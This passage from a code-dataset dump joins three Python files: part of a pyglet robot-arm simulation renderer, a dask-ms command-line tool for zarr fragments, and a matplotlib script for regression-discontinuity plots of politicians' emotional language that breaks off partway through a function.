self.arm2 = self.batch.add(\n            4, pyglet.gl.GL_QUADS, None,\n            ('v2f', [100, 150,\n                     100, 160,\n                     200, 160,\n                     200, 150]), \n            ('c3B', (249, 86, 86) * 4,))\n    \n    def render(self):# refresh and display\n        self._update_arm()# update arm geometry\n        self.switch_to()\n        self.dispatch_events()\n        self.dispatch_event('on_draw')\n        self.flip()\n    \n    def on_draw(self):# redraw the arm\n        self.clear()# clear the screen\n        self.batch.draw()# draw everything in the batch\n    \n    def _update_arm(self):# update arm geometry\n        (a1l, a2l) = self.arm_info['len']\n        (a1r, a2r) = self.arm_info['ran']\n        a1xy = self.center_coord\n        a1xy_ = np.array([np.cos(a1r), np.sin(a1r)]) * a1l + a1xy\n        a2xy_ = np.array([np.cos(a1r+a2r), np.sin(a1r+a2r)]) * a2l + a1xy_\n        \n        a1tr, a2tr = np.pi / 2 - self.arm_info['ran'][0], np.pi / 2 - self.arm_info['ran'].sum()\n        xy000 = a1xy + np.array([-np.cos(a1tr), np.sin(a1tr)]) * self.bar_thc\n        xy001 = a1xy + np.array([np.cos(a1tr), -np.sin(a1tr)]) * self.bar_thc\n        xy011 = a1xy_ + np.array([np.cos(a1tr), -np.sin(a1tr)]) * self.bar_thc\n        xy012 = a1xy_ + np.array([-np.cos(a1tr), np.sin(a1tr)]) * self.bar_thc\n        \n        xy100 = a1xy_ + np.array([np.cos(a2tr), -np.sin(a2tr)]) * self.bar_thc\n        xy101 = a1xy_ + np.array([-np.cos(a2tr), np.sin(a2tr)]) * self.bar_thc\n        xy111 = a2xy_ + np.array([-np.cos(a2tr), np.sin(a2tr)]) * self.bar_thc\n        xy112 = a2xy_ + np.array([np.cos(a2tr), -np.sin(a2tr)]) * self.bar_thc\n        \n        self.arm1.vertices = 
np.concatenate((xy000, xy001, xy011, xy012))\n self.arm2.vertices = np.concatenate((xy100, xy101, xy111, xy112))\n \n def stopandclose(self):\n self.close()\n \n \n#if __name__ == '__main__':\n# env = ArmEnv()\n# count = 10000\n# while 0 < count:\n# count -= 1\n# env.render()\n# env.step(env.sample_action())\n# env.close()","repo_name":"yangnaGitHub/LearningProcess","sub_path":"module/dqn/机器手臂/armenv.py","file_name":"armenv.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74482291751","text":"import click\nimport dask\nfrom daskms.fsspec_store import DaskMSStore\nfrom daskms.experimental.fragments import get_ancestry\nfrom daskms.experimental.zarr import xds_to_zarr, xds_from_zarr\n\n\n@click.group(help=\"Base command for interacting with fragments.\")\ndef fragments():\n pass\n\n\n@click.command(help=\"List fragment and parents.\")\n@click.argument(\n \"fragment_path\",\n type=DaskMSStore,\n)\n@click.option(\n \"-p/-np\",\n \"--prune/--no-prune\",\n default=False,\n)\ndef stat(fragment_path, prune):\n\n ancestors = get_ancestry(fragment_path, only_required=prune)\n\n click.echo(\"Ancestry:\")\n\n for i, fg in enumerate(ancestors):\n if i == 0:\n click.echo(f\" {fg.full_path} ---> root\")\n elif i == len(ancestors) - 1:\n click.echo(f\" {fg.full_path} ---> target\")\n else:\n click.echo(f\" {fg.full_path}\")\n\n\n@click.command(help=\"Change fragment parent.\")\n@click.argument(\n \"fragment_path\",\n type=DaskMSStore,\n)\n@click.argument(\n \"parent_path\",\n type=DaskMSStore,\n)\ndef rebase(fragment_path, parent_path):\n xdsl = xds_from_zarr(fragment_path, columns=[])\n\n xdsl = [\n xds.assign_attrs({\"__dask_ms_parent_url__\": parent_path.url}) for xds in xdsl\n ]\n\n writes = xds_to_zarr(xdsl, fragment_path)\n\n dask.compute(writes)\n\n\nfragments.add_command(stat)\nfragments.add_command(rebase)\n\n\ndef main():\n fragments()\n","repo_name":"ratt-ru/dask-ms","sub_path":"daskms/apps/fragments.py","file_name":"fragments.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"28268786979","text":"import argparse\nfrom copy import deepcopy\nimport collections\nfrom datetime import datetime\nimport numpy as np\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.dates as mdates\nfrom matplotlib.legend import Legend\nfrom matplotlib.legend_handler import HandlerBase\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Polygon\nimport matplotlib.pyplot as plt\nfrom matplotlib.text import Text as mText\nimport pandas as pd\nimport pickle\nfrom pathlib import Path\nimport re\nimport string\nimport sys\nfrom typing import Dict, List, Tuple\n\nsys.path.append(str(Path(__file__).parent.parent)) # Only works when keeping the original repo structure\nfrom utils.plots import saveFigure, timeLinePlot, ONE_COL_FIGSIZE, TWO_COL_FIGSIZE, NARROW_TWO_COL_FIGSIZE, \\\n NARROW_NARROW_TWO_COL_FIGSIZE, PRESIDENTIAL_ELECTIONS, LANDSCAPE_NARROW_FIGSIZE, LANDSCAPE_FIGSIZE\nfrom analysis.RDD import RDD, KINK, TITLES, NAMES\nfrom analysis.aggregate import MISSING_MONTHS\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--rdd', help='Folder containing fitted RDDs', required=True)\nparser.add_argument('--img', help='Folder to write images to.', required=True)\nparser.add_argument('--SI', help='SI material', required=False, type=str)\n\nFONTSIZE = 14\nCORE_FEATURES = 
['liwc_Negemo', 'liwc_Anger', 'liwc_Anx', 'liwc_Sad', 'liwc_Swear']\nSI_FEATURES = ['liwc_Negemo', 'empath_negative_emotion', 'liwc_Anger', 'liwc_Anx', 'liwc_Sad', 'liwc_Swear', 'empath_swearing_terms']\nLIWC_FEATURES = CORE_FEATURES + ['liwc_Posemo']\nDROPPED_DATA = [datetime(int(m.split('-')[0]), int(m.split('-')[1]), 15) for m in MISSING_MONTHS]\n\n# Colors, after https://mikemol.github.io/technique/colorblind/2018/02/11/color-safe-palette.html\nVERMILLION = '#D55E00'\nORANGE = '#E69F00'\nSKYBLUE = '#56B4E9'\nREDDISH = '#CC79A7'\nBLUE = '#0072B2'\nBLUEGREEN = '#009E73'\n\n\ndef _default_style(): return {'color': 'tab:grey', 'linewidth': 2.5, 'scatter_color': 'tab:grey'}\n\n\nSTYLES = {\n 'liwc_Negemo': {'color': VERMILLION, 'linewidth': 2.5, 'scatter_color': VERMILLION},\n 'empath_negative_emotion': {'color': VERMILLION, 'linewidth': 2.5, 'scatter_color': VERMILLION},\n 'liwc_Anger': {'color': ORANGE, 'linewidth': 2.5, 'scatter_color': ORANGE},\n 'liwc_Anx': {'color': SKYBLUE, 'linewidth': 2.5, 'scatter_color': SKYBLUE},\n 'liwc_Sad': {'color': REDDISH, 'linewidth': 2.5, 'scatter_color': REDDISH},\n 'liwc_Swear': {'color': BLUE, 'linewidth': 2.5, 'scatter_color': BLUE},\n 'empath_swearing_terms': {'color': BLUE, 'linewidth': 2.5, 'scatter_color': BLUE},\n 'liwc_Posemo': {'color': BLUEGREEN, 'linewidth': 2.5, 'scatter_color': BLUEGREEN},\n 'linreg': {'color': 'black', 'linewidth': 2.5, 'linestyle': '-.'}\n}\n\nPARTY_STYLES = {\n 'democrats': {'color': 'tab:blue', 'linewidth': 2.5, 'scatter_color': 'tab:blue', 'label': 'Democrats'},\n 'republicans': {'color': 'tab:red', 'linewidth': 2.5, 'scatter_color': 'tab:red', 'label': 'Republicans'}\n}\n\nPOLITICIAN_IDS = { # Make Individual Plots for these\n 'Q76': 'Barack Obama',\n 'Q6294': 'Hillary Clinton',\n 'Q22686': 'Donald Trump',\n 'Q6279': 'Joe Biden',\n 'Q24313': 'Mike Pence',\n 'Q4496': 'Mitt Romney',\n}\n# 'Q10390': 'John McCain'\n\nPROMINENCE_IDS = { # Annotate them in score-vs-verbosity plots\n 'Q76': 'Barack Obama',\n 'Q22686': 'Donald Trump',\n 'Q4496': 'Mitt Romney',\n 'Q6294': 'Hillary Clinton',\n 'Q207': 'George W. Bush',\n 'Q10390': 'John McCain',\n 'Q6279': 'Joe Biden',\n}\n# 'Q170581': 'Nancy Pelosi',\n\nPROMINENCE_SHORT = {\n 'Barack Obama': 'O',\n 'Donald Trump': 'T',\n 'Mitt Romney': 'R',\n 'Hillary Clinton': 'C',\n 'George W. 
Bush': 'Bu',\n 'John McCain': 'M',\n 'Joe Biden': 'Bi',\n}\n# 'Nancy Pelosi': 'P',\n# 'Bernie Sanders': 'S'\n\nV_label = {\n 0: 'Most prominent speaker quartile',\n 1: '2nd most prominent speaker quartile',\n 2: '3rd most prominent speaker quartile',\n 3: 'Least prominent speaker quartile'\n}\n\n\ndef _conf_only(ax: plt.axis, feature: str, model: RDD, color: str):\n lower, upper = model._rdd_confidence(feature)\n from_date = 0\n for low, up in zip(lower, upper):\n to_date = from_date + len(low)\n ax.fill_between(model.data.date[from_date:to_date], low, up, alpha=.2, color=color)\n from_date = to_date\n\n\ndef _rdd_only(ax: plt.axis, feature: str, model: RDD, kwargs: Dict):\n kwargs = deepcopy(kwargs)\n del kwargs['scatter_color']\n X_rdd, Y_rdd = model._get_rdd_plot_data(feature)\n dates_rdd = [model._get_approx_date(x) for x in X_rdd]\n for i in range(len(dates_rdd) // 2):\n if i > 0:\n kwargs['label'] = ''\n timeLinePlot([dates_rdd[2 * i], dates_rdd[2 * i + 1]], [Y_rdd[2 * i], Y_rdd[2 * i + 1]], ax=ax, snsargs=kwargs)\n\n\ndef _scatter_only(ax: plt.axis, feature: str, model: RDD, color: str, s: int = 25):\n timeLinePlot(model.data.date, model.data[feature], ax=ax, snsargs={'s': s, 'color': color}, kind='scatter')\n\n\ndef _grid_annotate(ax: plt.axis, model: RDD, feature: str, **kwargs):\n txt = r\"{\\mathrm{adj}}\"\n r2 = f'$R^2_{txt}$={model.rdd[feature].loc[\"r2_adj\"]:.2f}'\n params = '\\n'.join([\n ', '.join([\n r'$\\alpha_0$=' +\n model.get_table(asPandas=True)[r'$\\alpha_0$'].loc[feature].split('(')[0],\n r'$\\beta_0$=' +\n model.get_table(asPandas=True)[r'$\\beta_0$'].loc[feature].split('(')[0]\n ]),\n ', '.join([\n r'$\\alpha$=' + model.get_table(asPandas=True)[r'$\\alpha$'].loc[feature].split('(')[\n 0],\n r'$\\beta$=' + model.get_table(asPandas=True)[r'$\\beta$'].loc[feature].split('(')[0]\n ])\n ])\n # Aligned version in comments:\n # params = '\\\\\\\\'.join([\n # ', '.join([\n # r'\\alpha_0=' +\n # model.get_table(asPandas=True)[r'$\\alpha_0$'].loc[feature].split('(')[0],\n # r'&\\beta_0=' +\n # model.get_table(asPandas=True)[r'$\\beta_0$'].loc[feature].split('(')[0]\n # ]),\n # ', '.join([\n # r'\\alpha=' + model.get_table(asPandas=True)[r'$\\alpha$'].loc[feature].split('(')[\n # 0],\n # r'&\\beta=' + model.get_table(asPandas=True)[r'$\\beta$'].loc[feature].split('(')[0]\n # ])\n # ])\n # params = r'\\begin{align*}' + re.sub(r'(\\*+)', r'\\\\text{\\1}', params) + r'\\end{align*}'\n # rc('text', usetex=True)\n # rc('text.latex', preamble=r'\\usepackage{amsmath}')\n default_box_props = dict(boxstyle='round', facecolor='white', alpha=.75, ec='none')\n box_props = kwargs.get('box_props', default_box_props)\n ax.text(0.03, 0.05, r2, transform=ax.transAxes, fontsize=FONTSIZE-2, verticalalignment='bottom',\n horizontalalignment='left', bbox=box_props)\n ax.text(0.5, kwargs.get('param_y', .97), params, transform=ax.transAxes, fontsize=FONTSIZE-2, verticalalignment='top',\n horizontalalignment='center', bbox=box_props)\n # rc('text', usetex=False)\n\n\ndef grid(models: Dict[str, RDD], ncols: int, nrows: int, features: List[str], style: Dict, gridspec: bool = False,\n **kwargs):\n fontsize = kwargs.get('fontsize', FONTSIZE)\n fontweight = kwargs.get('fontweight', 'bold')\n names = kwargs.get('names', NAMES)\n\n if gridspec:\n assert len(features) == 5, \"Other gridspecs not supported.\"\n fig = plt.figure(figsize=TWO_COL_FIGSIZE)\n gs = fig.add_gridspec(2, 6)\n axs = [\n fig.add_subplot(gs[0, :3]),\n fig.add_subplot(gs[0, 3:6]),\n fig.add_subplot(gs[1, :2]),\n fig.add_subplot(gs[1, 
2:4]),\n fig.add_subplot(gs[1, 4:6]),\n ]\n elif kwargs.get('axs', None) is not None:\n fig = plt.gcf()\n axs = kwargs.get('axs')\n else:\n fig, axs = plt.subplots(figsize=NARROW_TWO_COL_FIGSIZE, ncols=ncols, nrows=nrows, sharex='all', sharey='all')\n\n ymin = np.inf\n ymax = - np.inf\n for name, model in models.items():\n for i, feature in enumerate(features):\n ROW = i % nrows\n COL = i // nrows\n if isinstance(axs[0], np.ndarray):\n ax = axs[ROW][COL]\n else:\n ax = axs[i]\n ax.set_title(names[feature], fontsize=fontsize, fontweight=fontweight)\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[i] + ')', fontfamily='serif', loc='left',\n fontsize=FONTSIZE+2, fontweight='bold') # Subplot naming\n try:\n selectedStyle = style[feature]\n except KeyError:\n try:\n selectedStyle = style[name][feature]\n except KeyError:\n selectedStyle = style[name]\n\n model.plot(feature,\n ax=ax,\n annotate=kwargs.get('annotate', False),\n lin_reg=kwargs.get('lin_reg', False),\n visuals=kwargs.get('visuals', False),\n **selectedStyle)\n\n if COL > 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n if kwargs.get('grid_annotate', False):\n if kwargs.get('y_param'): # plug any number of other features in here if necessary\n _grid_annotate(ax, model, feature, y_param=kwargs.get('y_param'))\n else:\n _grid_annotate(ax, model, feature)\n if kwargs.get('mean_adapt', False):\n _, Y = model._get_rdd_plot_data(feature)\n ymin = min(ymin, min(Y))\n ymax = max(ymax, max(Y))\n else:\n ymin = min(ymin, min(model.data[feature]))\n ymax = max(ymax, max(model.data[feature]))\n if kwargs.get('ylabel', False) and (COL == 0):\n ax.set_ylabel(kwargs.get('ylabel'), fontsize=FONTSIZE)\n if kwargs.get('right_ylabel', False) and (COL == ncols - 1):\n ax.set_ylabel(kwargs.get('right_ylabel'), fontsize=FONTSIZE)\n ax.yaxis.set_label_position(\"right\")\n\n ydiff = ymax - ymin\n if gridspec:\n axs = [axs] # Quick hack to allow the following iteration\n for row in axs:\n if not isinstance(row, np.ndarray):\n row = [row]\n for ax in row:\n if kwargs.get('legend', False):\n ax.legend(fontsize=fontsize, loc='lower left', framealpha=1, fancybox=False,\n ncol=kwargs.get('legendCols', 1))\n else:\n try:\n ax.get_legend().remove()\n except AttributeError:\n pass # There was no legend to begin with\n ax.tick_params(axis='both', which='major', labelsize=fontsize)\n if kwargs.get('mean_adapt', False):\n ax.set_ylim(ymin - ydiff, ymax + ydiff)\n else:\n ax.set_ylim(ymin - 0.25 * ydiff, ymax + 0.25 * ydiff)\n ax.set_xlim(13926.0, 18578.0)\n\n plt.minorticks_off()\n return fig, axs\n\n\ndef scatter_grid(nrows, ncols, model, features, ylims=None, figsize=TWO_COL_FIGSIZE, axs=None, **kwargs):\n if axs is None:\n fig, axs = plt.subplots(figsize=figsize, ncols=ncols, nrows=nrows, sharex='all', sharey='all', squeeze=False)\n else:\n fig = plt.gcf()\n if nrows == 1: # Repack\n axs = [axs]\n if ncols == 1:\n axs = [axs]\n fontsize = kwargs.get('fontsize', FONTSIZE)\n\n ymin, ymax = np.inf, -np.inf\n for i, feature in enumerate(features):\n ROW = i // ncols\n COL = i % ncols\n ax = axs[ROW][COL]\n _scatter_only(ax, feature, model, STYLES[feature]['color'])\n ax.set_title(NAMES[feature], fontweight='bold', fontsize=fontsize)\n ymin = min(ymin, min(model.data[feature]))\n ymax = max(ymax, max(model.data[feature]))\n if COL == 0:\n ax.set_ylabel('Pre-campaign z-scores', fontsize=fontsize)\n if ncols * nrows != 1:\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[i]+ ')', fontfamily='serif', loc='left', 
fontsize=fontsize + 2, fontweight='bold')\n\n ydiff = ymax - ymin\n for row in axs:\n for ax in row:\n ax.tick_params(axis='both', which='major', labelsize=fontsize)\n ax.set_ylim(ymin - 0.25 * ydiff, ymax + 0.25 * ydiff)\n if ylims is not None:\n ax.set_ylim(ylims[0], ylims[1])\n\n fig.autofmt_xdate(rotation=90, ha='left')\n plt.minorticks_off()\n return fig, axs\n\n\ndef basic_model_plots(model_file: Path, base: Path, ylims: Tuple[float, float] = None):\n \"\"\"\n Creates a single plot for every feature the RDD was fitted on.\n Parameters\n ----------\n model_file: Path to an RDD Model\n base: Base folder to store results in\n ylims: Another way to control the y axis limits: They can be directly provided here.\n -------\n \"\"\"\n model = pickle.load(model_file.open('rb'))\n\n # 5x grid\n fig, axs = grid({'agg': model}, 5, 1, CORE_FEATURES, STYLES, grid_annotate=True,\n ylabel='Pre-campaign z-scores')\n saveFigure(fig, base.joinpath('negative_and_swear_grid'))\n\n # 2 x 3 Grid only scatter\n fig, axs = scatter_grid(2, 3, model, LIWC_FEATURES, ylims)\n saveFigure(fig, base.joinpath('2x3_scatter_grid'))\n plt.close()\n\n # Negative Grid only scatter\n fig, axs = scatter_grid(1, 5, model, CORE_FEATURES, ylims, figsize=NARROW_NARROW_TWO_COL_FIGSIZE)\n saveFigure(fig, base.joinpath('negative_scatter_grid'))\n plt.close()\n\n # Negative Grid only posemo\n fig, axs = scatter_grid(1, 1, model, ['liwc_Posemo'], ylims)\n saveFigure(fig, base.joinpath('posemo_scatter'))\n plt.close()\n\n\ndef outlier_plots(model_file: Path, store: Path):\n \"\"\"\n Creates a comparison between \"basic\" and \"outliers removed\" for every feature the RDD was fitted on.\n Parameters\n ----------\n model_file: Path to an RDD Model, including outliers. Naming of the non-outlier model must follow project structure.\n store: Base folder to store results in\n -------\n\n \"\"\"\n outliers = pickle.load(model_file.open('rb'))\n base_model = pickle.load(model_file.parent.joinpath(re.sub('_outliers', '', model_file.name)).open('rb'))\n\n models = collections.OrderedDict()\n models['With Outliers'] = base_model\n models['Without Outliers'] = outliers\n\n outlierStyle = {k: STYLES[k] for k in STYLES}\n baseStyle = {k: _default_style() for k in STYLES}\n for k in baseStyle:\n outlierStyle[k]['label'] = 'With Outliers'\n outlierStyle[k]['scatter_color'] = STYLES[k]['color']\n baseStyle[k]['label'] = 'Without Outliers'\n baseStyle[k]['scatter_color'] = 'tab:grey'\n\n fig, axs = grid(models, 5, 1, CORE_FEATURES,\n {'With Outliers': outlierStyle, 'Without Outliers': baseStyle}, mean_adapt=True, legend=True,\n ylabel='Pre-campaign z-scores')\n\n saveFigure(fig, store.joinpath('negative_and_swear_grid'))\n\n\ndef individual_plots(folder: Path, base: Path):\n \"\"\"\n Creates all feature plots for every feature for every individual RDD in the given folder.\n Parameters\n ----------\n folder: Parent folder, containing RDDs fitted on individual aggregates\n base: Base folder to store figures in\n \"\"\"\n for file in folder.iterdir():\n if not file.name.endswith('pickle'):\n continue\n qid = file.name.split('_')[0]\n if qid not in POLITICIAN_IDS:\n continue\n clearname = POLITICIAN_IDS[qid]\n if 'outlier' in file.name:\n # outlier_plots(file, save_in.joinpath(clearname + '_outlier'))\n pass # We don't really need that\n else:\n basic_model_plots(file, base.joinpath(clearname), ylims=(-10, 20))\n\n\ndef verbosity_vs_parameter(folder: Path, base: Path, kind: str, alpha_CI: float = 0.05, **kwargs):\n \"\"\"\n Plots RDD parameters (y-Axis) 
vs speaker verbosity (x-axis)\n Parameters\n ----------\n folder: RDD models folder\n base: Img storage folder\n kind: Either \"individual\" or \"ablation\" - changes style adjustments\n alpha_CI: Confidence Interval parameter\n \"\"\"\n verbosity = folder.parent.parent.joinpath('speaker_counts.csv')\n assert verbosity.exists(), \"To create the scatter plot influence / verbosity, there needs to be a speaker count file.\"\n base_model_path = folder.parent.joinpath('QuotationAggregation_RDD.pickle')\n assert base_model_path.exists(), \"To create the scatter plot influence / verbosity, there needs to be a Quotation Aggregation file.\"\n base_model = pickle.load(base_model_path.open('rb'))\n\n def _get_qid(s: str) -> str:\n if 'outlier' in s:\n print('WARNING: Are outlier data supposed to be analysed for individuals?')\n return re.search('Q[0-9]+', s)[0]\n\n class TextHandlerB(HandlerBase):\n \"\"\"\n Allows adding text as legend Handle.\n Source: https://stackoverflow.com/questions/27174425/how-to-add-a-string-as-the-artist-in-matplotlib-legend\n \"\"\"\n\n def create_artists(self, legend, text, xdescent, ydescent, width, height, fontsize, trans):\n tx = mText(width / 2., height / 2, text, fontsize=fontsize, ha=\"center\", va=\"center\", fontweight=\"bold\")\n return [tx]\n\n # Allow text annotations for the legend\n Legend.update_default_handler_map({str: TextHandlerB()})\n names = list(set([_get_qid(speaker.name) for speaker in folder.iterdir() if 'outlier' not in speaker.name]))\n\n verbosity_df = pd.read_csv(verbosity)\n verbosity_df = verbosity_df[verbosity_df.QID.isin(names)]\n plot_data = {\n feature: pd.DataFrame(columns=names,\n index=['alpha', 'beta', 'verbosity', 'alpha_low', 'alpha_high', 'beta_low',\n 'beta_high', 'p_alpha', 'p_beta'])\n for feature in CORE_FEATURES\n }\n\n for speaker in folder.iterdir():\n if not (speaker.name.endswith('.pickle')):\n continue\n qid = _get_qid(speaker.name)\n speaker_data = pickle.load(speaker.open('rb'))\n for feature in plot_data:\n summary = pd.read_html(speaker_data.rdd_fit[feature].summary(alpha=alpha_CI).tables[1].as_html(), header=0,\n index_col=0)[0]\n lower_CI, upper_CI = summary.columns[4:6]\n alpha_low, alpha_high = summary[lower_CI].loc['C(threshold)[T.1]'], summary[upper_CI].loc[\n 'C(threshold)[T.1]']\n beta_low, beta_high = summary[lower_CI].loc['C(threshold)[T.1]:time_delta'], summary[upper_CI].loc[\n 'C(threshold)[T.1]:time_delta']\n alpha = summary['coef'].loc['C(threshold)[T.1]']\n beta = summary['coef'].loc['C(threshold)[T.1]:time_delta']\n p_alpha = speaker_data.rdd_fit[feature].pvalues['C(threshold)[T.1]']\n p_beta = speaker_data.rdd_fit[feature].pvalues['C(threshold)[T.1]:time_delta']\n plot_data[feature].at['p_alpha', qid] = p_alpha\n plot_data[feature].at['p_beta', qid] = p_beta\n plot_data[feature].at['alpha', qid] = alpha\n plot_data[feature].at['alpha_low', qid] = alpha_low\n plot_data[feature].at['alpha_high', qid] = alpha_high\n plot_data[feature].at['beta', qid] = beta\n plot_data[feature].at['beta_low', qid] = beta_low\n plot_data[feature].at['beta_high', qid] = beta_high\n plot_data[feature].at['verbosity', qid] = verbosity_df[verbosity_df.QID == qid]['Unique Quotations'].values[0]\n\n for param in kwargs.get('params', ('alpha', 'beta')):\n if kwargs.get('axs', None) is None:\n if kind == 'individual':\n fig, all_axs = plt.subplots(figsize=[17.8, 9], ncols=5, nrows=2, sharey='row')\n axs = all_axs[0, :]\n axs_cum = all_axs[1, :]\n else:\n fig, axs = plt.subplots(figsize=NARROW_TWO_COL_FIGSIZE, ncols=5, nrows=1, 
sharex='all', sharey='all')\n else:\n assert kwargs.get('params', None) is not None\n axs = kwargs.get('axs')\n fig = plt.gcf()\n\n significant_count = 0\n significant_positive = 0\n cumulative_annotations = []\n cumulative_values = dict()\n for i, (feature, data) in enumerate(plot_data.items()):\n verbosity2sign = []\n ax = axs[i]\n ax.set_xscale('log')\n if kind == 'individual':\n ax.axhline(y=0, linestyle='--', color='black', linewidth=0.8)\n else:\n key = 'C(threshold)[T.1]' if param == 'alpha' else 'C(threshold)[T.1]:time_delta'\n baseline = base_model.rdd[feature][key]\n summary = \\\n pd.read_html(base_model.rdd_fit[feature].summary(alpha=alpha_CI).tables[1].as_html(), header=0,\n index_col=0)[0]\n base_low, base_high = summary[lower_CI].loc[key], summary[upper_CI].loc[key]\n ax.axhline(y=baseline, linestyle='--', color='black')\n for qid in data.columns:\n isTrump = int(qid == 'Q22686')\n CI_low, CI_high = data[qid].loc[param + '_low'], data[qid].loc[param + '_high']\n param_pval = data[qid].loc[f'p_{param}']\n # Highlight \"significant\" points where CIs share a sign\n clr = STYLES[feature]['color']\n if kind == 'individual':\n color = clr if (CI_low * CI_high > 0) else 'grey'\n significant_count += int(param_pval < 0.05)\n significant_positive += int((param_pval < 0.05) and (data[qid].loc[param] > 0))\n else:\n # color = clr if (base_low > CI_high) else 'grey'\n color = clr if isTrump else 'grey'\n ax.plot((data[qid].loc['verbosity'], data[qid].loc['verbosity']), (CI_low, CI_high), '-', color=color,\n linewidth=0.3 + 2 * isTrump)\n ax.scatter(x=data[qid].loc['verbosity'], y=data[qid].loc[param], c=color, s=7.5 * (1 + 3 * isTrump))\n verbosity2sign.append([data[qid].loc['verbosity'], data[qid].loc[param] > 0])\n if qid in PROMINENCE_IDS:\n x_annot = int(data[qid].loc['verbosity'])\n y_annot = CI_low\n cumulative_annotations.append((qid, x_annot))\n offset = 0.08 if param == 'alpha' else 0.002\n if kind == 'individual':\n offset *= 3\n va = 'top'\n if (param == 'alpha') and (isTrump and (feature in ['liwc_Anger', 'liwc_Anx']) or feature == 'liwc_Sad'):\n y_annot = CI_high + 3 * offset # Annotation would leave the axis else\n va = 'bottom'\n ax.annotate(PROMINENCE_SHORT[PROMINENCE_IDS[qid]], (x_annot, y_annot - offset), ha='center',\n va=va, label=PROMINENCE_IDS[qid], fontweight='bold', fontsize=FONTSIZE - 4)\n\n if kind == 'individual':\n annot = rf'$\\{param}>0: {(data.loc[param] > 0).sum()}/{len(data.columns)}$' + '\\n' + \\\n rf'(${significant_positive}/{significant_count}$' + rf' with $p<0.05$)'\n box_props = dict(boxstyle='round', facecolor=None, alpha=0, ec='none')\n # Commented out, info is now contained in the cumulative plot\n # ax.text(0.97, 0.05, annot, transform=ax.transAxes, fontsize=FONTSIZE - 2, multialignment='center',\n # verticalalignment='bottom', horizontalalignment='right', bbox=box_props)\n\n ax.set_title(NAMES[feature], fontsize=FONTSIZE, fontweight='bold')\n ax.tick_params(labelbottom=True)\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[i] + ')', fontfamily='serif', loc='left',\n fontsize=FONTSIZE+2, fontweight='bold')\n if i > 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n else:\n labelText = 'without individuals' if kind == 'ablation' else 'for individuals only'\n ax.set_ylabel(r'$\\{}$ {}'.format(param, labelText), fontsize=FONTSIZE-2)\n if (param == 'alpha') and (kind == 'individual'):\n ax.set_ylim(-20, 20)\n ax.set_yticks([-10, 10])\n ax.set_yticklabels(['-10', '10'])\n elif (param == 'alpha') and (kind == 
'ablation'):\n ax.set_ylim([-.5, 3])\n elif (param == 'beta') and (kind == 'ablation'):\n ax.set_ylim([-0.01, 0.05])\n ax.set_xlabel('Number of quotes', fontsize=FONTSIZE-2)\n\n # Now make the cumulative plot\n if kind == 'individual':\n ax = axs_cum[i]\n ax.set_xscale('log')\n ax.set_xlabel('Number $n$ of quotes', fontsize=FONTSIZE-2)\n ax.set_title(NAMES[feature], fontsize=FONTSIZE, fontweight='bold')\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[5+i] + ')', fontfamily='serif',\n loc='left', fontsize=FONTSIZE + 2, fontweight='bold')\n x_axis, is_positive = zip(*sorted(verbosity2sign, reverse=True)) # Verbose to \"silent\"\n y_axis = [sum(is_positive[:i]) / i for i in range(1, 1+len(x_axis))] # Running mean from right to left\n ax.axhline(.5, linewidth=.5, linestyle='dashed', color='grey')\n ax.plot(x_axis, y_axis, color=STYLES[feature]['color'], linewidth=STYLES[feature]['linewidth'])\n cumulative_values[feature] = [x_axis, y_axis]\n if i > 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n else:\n ax.set_ylabel('Fraction of speakers with $\\\\{} > 0$\\namong those with $\\geq n$ quotes'.format(param), fontsize=FONTSIZE-2)\n\n # Annotate famous speakers\n for qid, x_val in cumulative_annotations:\n y_val = y_axis[x_axis.index(x_val)]\n\n ax.annotate(PROMINENCE_SHORT[PROMINENCE_IDS[qid]], (x_val, y_val + 0.03), ha='center', va='bottom',\n label=PROMINENCE_IDS[qid], fontweight='bold', fontsize=FONTSIZE-4)\n ax.scatter(x_val, y_val, color=STYLES[feature]['color'])\n if param == 'alpha':\n ax.set_ylim(0.3, 1.1)\n\n labels = list(PROMINENCE_SHORT.keys())\n handles = [PROMINENCE_SHORT[k] for k in labels]\n y_offset = -.15 if kind == 'ablation' else -.1\n fig.legend(fontsize=FONTSIZE, ncol=4, loc='lower center', bbox_to_anchor=(.5, y_offset),\n labels=labels, handles=handles)\n plt.tight_layout()\n\n if kind == 'individual':\n pickle.dump(cumulative_values, base.joinpath('cumulative_{}.pickle'.format(param)).open('wb'))\n\n if kwargs.get('axs', None) is None:\n saveFigure(fig, base.joinpath('verbosity_vs_{}'.format(param)))\n\n\ndef ablation_plots(folder: Path, base: Path):\n \"\"\"\n Generates two kinds of plots: One summarizing ablation plots, showing verbosity vs. 
the influence of leaving one\n speaker out on the overall parameters and then an \"individual\" plot for the newly fitted lines for all speakers\n that can be mapped to their real world names.\n Parameters\n ----------\n folder: Parent folder, containing RDDs fitted on data from all-but-one-individual each\n base: Base folder where to store figures in\n \"\"\"\n verbosity_vs_parameter(folder, base, 'ablation')\n # fig, axs = plt.subplots(nrows=2, ncols=5, figsize=TWO_COL_FIGSIZE, sharex='all', sharey='row')\n # verbosity_vs_parameter(folder, base, 'ablation', alpha_CI=0.17, params=['alpha'], axs=axs[0])\n # verbosity_vs_parameter(folder.parent.joinpath('Individuals'), base.parent.joinpath('Individuals'),\n # 'individual', alpha_CI=0.17, params=['alpha'], axs=axs[1], prefix='fghijklmno')\n # saveFigure(fig, base.parent.joinpath('combinedIndividual').joinpath('alpha.pdf'))\n\n\ndef individuals(folder: Path, base: Path):\n \"\"\"\n Creates all feature plots for every feature for every individual RDD in the given folder.\n Parameters\n ----------\n folder: Parent folder, containing RDDs fitted on individual aggregates\n base: Base folder to store figures in\n \"\"\"\n individual_plots(folder, base)\n verbosity_vs_parameter(folder, base, 'individual')\n\n\ndef party_plots(folder: Path, base: Path):\n 